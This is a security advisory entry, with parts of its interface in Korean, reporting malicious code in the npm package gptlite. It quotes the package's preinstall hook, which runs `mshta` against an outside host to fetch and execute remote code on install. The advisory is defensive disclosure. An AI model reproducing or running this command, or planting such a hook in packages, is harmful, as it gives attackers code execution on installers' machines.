VDB
EN

MAL-2026-10461

Malicious code in gptlite (npm)

상세

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662) The package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's "preinstall": "node preinstall.js") invokes child_process.exec with the command `cmd /c "mshta http://fixars.top"`. On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code. The fetch runs automatically on `npm install`, before any consumer code is reviewed, and delivers arbitrary attacker-controlled code execution on the installer's machine. The destination domain is unrelated to any documented package purpose and is served over unauthenticated HTTP, so the executed content is fully attacker-controlled and mutable.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / gptlite

No fixed version published yet for gptlite (npm). Pin to a known-safe version or switch to an alternative.

참고